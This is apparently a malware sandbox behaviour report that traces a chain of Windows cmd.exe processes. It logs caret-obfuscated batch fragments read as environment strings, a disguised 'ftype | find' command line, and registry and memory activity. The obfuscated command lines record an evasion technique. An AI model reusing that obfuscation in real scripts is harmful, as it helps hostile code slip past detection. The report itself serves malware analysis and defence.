Get Environment String name = ^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^ False 1
Fn
Get Environment String name = ^R^en^6^w^L^P^jy^{^7^y^j^U^6^ False 1
Fn
Get Environment String name = ^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^ False 1
Fn
Get Environment String name = ^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^ False 1
Fn
Get Environment String name = ^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^ False 1
Fn
Get Environment String name = z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^ False 1
Fn
Get Environment String name = R^en6w^L^P^j^y^{^7^y^jU^6^ False 1
Fn
Get Environment String name = ^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^ False 1
Fn
Get Environment String name = ^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^ False 1
Fn
Get Environment String name = ^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^ False 1
Fn
Get Environment String name = ^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^ False 1
Fn
Get Environment String name = ^R^en^6^w^L^P^j^y^{^7^y^j^U6^ False 1
Fn
Get Environment String name = ^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^ False 1
Fn
Get Environment String name = .^Y^.^Y^6^j^U^e/`^6^K^w^L^,^ False 1
Fn
Get Environment String name = ^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^ False 1
Fn
Get Environment String name = ^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^ False 1
Fn
Get Environment String name = ^w^L^]^6^7^y^j^U^6^ False 1
Fn
Get Environment String name = ^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^ False 1
Fn
Get Environment String name = ^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^ False 1
Fn
Get Environment String name = e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^ False 1
Fn
Get Environment String name = ^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^ False 1
Fn
Get Environment String name = ^=^T!)&& (, ; , ;, ( , ; , (^S^e^T ^ ^ ^ ^}^\=^!^[^$^#^?^ False 1
Fn
Get Environment String name = ^!) , )&& ( , (^S^e^t ^ ^ ^*^}=^!^*^.^@^ False 1
Fn
Get Environment String name = ^g; ; , ^iN , ( ,'; ; ^^ft^^Y^^p^^e ;; , ^|, , ^^f^^iN^^d^^S^^t^^r ;^^c^^m '; ,) , ; ^d^o, , ;; ; (^e^c^h^O , False 1
Fn
Get Environment String name = ^*^[^-^, False 1
Fn
Get Environment String name = | False 1
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
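Process #4: cmd.exe (child of process #3; with cmd's ^ escape characters stripped, the command line below reads: ftype | find "SHCm")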
60 0
Information Value
ID #4
File Name c:\windows\system32\cmd.exe
Command Line C:\Windows\system32\cmd.exe /c ^f^t^Yp^e | ^f^IN^d "SHCm"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:39, Reason: Child Process
Unmonitor End Time: 00:01:42, Reason: Self Terminated
Monitor Duration 00:00:03
OS Process Information
Information Value
PID 0xae0
Parent PID 0xac0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xAE4
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory r True False False -
private_0x00000000000d0000 0x000d0000 0x001cffff Private Memory rw True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory rw True False False -
private_0x00000000001e0000 0x001e0000 0x001e0fff Private Memory rw True False False -
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory rw True False False -
private_0x00000000002b0000 0x002b0000 0x002bffff Private Memory rw True False False -
private_0x0000000000370000 0x00370000 0x0046ffff Private Memory rw True False False -
private_0x0000000000470000 0x00470000 0x0056ffff Private Memory rw True False False -
pagefile_0x0000000000570000 0x00570000 0x006f7fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000700000 0x00700000 0x00880fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000890000 0x00890000 0x01c8ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001c90000 0x01c90000 0x01fd2fff Pagefile Backed Memory r True False False -
sortdefault.nls 0x01fe0000 0x022aefff Memory Mapped File r False False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory rw True False False -
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory rw True False False -
Host Behavior
File (9)
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Open STD_OUTPUT_HANDLE - True 4
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (2)
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\cmd.exe os_pid = 0xae8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Windows\system32\find.exe os_pid = 0xaf0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:12 (UTC) True 1
Fn
Get Time type = Ticks, time = 137296 True 1
Fn
Environment (19)
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 3
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 4
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 2
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Set Environment String name = COPYCMD True 2
Fn
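Process #5: cmd.exe (left side of process #4's pipeline: runs ftype, which is consistent with the HKEY_LOCAL_MACHINE\Software\Classes\...\Shell\Open\Command enumeration listed under Registry below)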
5828 0
Information Value
ID #5
File Name c:\windows\system32\cmd.exe
Command Line C:\Windows\system32\cmd.exe /S /D /c" ftYpe "
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:39, Reason: Child Process
Unmonitor End Time: 00:01:43, Reason: Self Terminated
Monitor Duration 00:00:04
OS Process Information
Information Value
PID 0xae8
Parent PID 0xae0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xAEC
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
private_0x00000000000c0000 0x000c0000 0x001bffff Private Memory rw True False False -
pagefile_0x00000000001c0000 0x001c0000 0x001c6fff Pagefile Backed Memory r True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory rw True False False -
private_0x00000000001e0000 0x001e0000 0x001e0fff Private Memory rw True False False -
private_0x00000000001f0000 0x001f0000 0x002effff Private Memory rw True False False -
private_0x00000000002f0000 0x002f0000 0x002f0fff Private Memory rw True False False -
private_0x00000000003b0000 0x003b0000 0x004affff Private Memory rw True False False -
private_0x0000000000600000 0x00600000 0x0060ffff Private Memory rw True False False -
pagefile_0x0000000000610000 0x00610000 0x00797fff Pagefile Backed Memory r True False False -
pagefile_0x00000000007a0000 0x007a0000 0x00920fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000930000 0x00930000 0x01d2ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001d30000 0x01d30000 0x02072fff Pagefile Backed Memory r True False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
advapi32.dll 0x7feff0e0000 0x7feff1bafff Memory Mapped File rwx False False False -
sechost.dll 0x7feff1c0000 0x7feff1defff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
rpcrt4.dll 0x7feffc50000 0x7feffd7cfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory rw True False False -
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory rw True False False -
Host Behavior
File (1384)
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 344
Fn
Open STD_OUTPUT_HANDLE - True 692
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Write STD_OUTPUT_HANDLE size = 103 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 100 True 15
Fn
Data
Write STD_OUTPUT_HANDLE size = 124 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 122 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 126 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 119 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 118 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 98 True 9
Fn
Data
Write STD_OUTPUT_HANDLE size = 147 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 133 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 127 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 134 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 131 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 149 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 92 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 138 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 105 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 109 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 79 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 83 True 12
Fn
Data
Write STD_OUTPUT_HANDLE size = 80 True 6
Fn
Data
Write STD_OUTPUT_HANDLE size = 104 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 87 True 10
Fn
Data
Write STD_OUTPUT_HANDLE size = 89 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 85 True 6
Fn
Data
Write STD_OUTPUT_HANDLE size = 86 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 71 True 6
Fn
Data
Write STD_OUTPUT_HANDLE size = 72 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 17 True 6
Fn
Data
Write STD_OUTPUT_HANDLE size = 125 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 45 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 51 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 70 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 76 True 11
Fn
Data
Write STD_OUTPUT_HANDLE size = 35 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 82 True 10
Fn
Data
Write STD_OUTPUT_HANDLE size = 58 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 68 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 75 True 6
Fn
Data
Write STD_OUTPUT_HANDLE size = 61 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 63 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 73 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 67 True 7
Fn
Data
Write STD_OUTPUT_HANDLE size = 50 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 52 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 53 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 78 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 90 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 99 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 81 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 93 True 8
Fn
Data
Write STD_OUTPUT_HANDLE size = 91 True 9
Fn
Data
Write STD_OUTPUT_HANDLE size = 84 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 59 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 34 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 64 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 38 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 47 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 74 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 123 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 66 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 46 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 65 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 49 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 48 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 55 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 77 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 113 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 95 True 8
Fn
Data
Write STD_OUTPUT_HANDLE size = 129 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 94 True 6
Fn
Data
Write STD_OUTPUT_HANDLE size = 69 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 136 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 88 True 8
Fn
Data
Write STD_OUTPUT_HANDLE size = 60 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 97 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 96 True 8
Fn
Data
Write STD_OUTPUT_HANDLE size = 57 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 177 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 160 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 102 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 101 True 5
Fn
Data
Write STD_OUTPUT_HANDLE size = 110 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 144 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 142 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 141 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 117 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 108 True 4
Fn
Data
Write STD_OUTPUT_HANDLE size = 26 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 54 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 37 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 168 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 172 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 56 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 111 True 1
Fn
Data
Registry (2196)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\*\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSProject.Workspace\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSProject.XLS5\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSProject.XLS8\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSProject.XLTemplate\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSProject.XML\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.RdcLibrary\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.RdcLibrary.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.Similarity\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.Similarity.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.SimilarityFileIdTable\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.SimilarityFileIdTable.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.SimilarityTraitsTable\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSRDC.SimilarityTraitsTable.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.2\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.2.a\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.3\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.3.a\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.4\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.4.a\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.5\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.6\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRDP.MsRDP.7\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRdpWebAccess.MsRdpClientShell\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsRdpWebAccess.MsRdpClientShell.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msrtedit.AAMSREdit\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsScp.MSSCP\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsScp.MSSCP.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsScp.SCPTRANS\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MsScp.SCPTRANS.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSScriptControl.ScriptControl\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSScriptControl.ScriptControl.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSSearch.IpsPi\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSSearch.IpsPi.1\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Msshed.ShedDSO\Shell\Open\Command - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSSppLicenseFile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSSppPackageFile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\msstylesfile\Shell\Open\Command - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\MSTIME.TIMEFactory\Shell\Open\Command - False 1
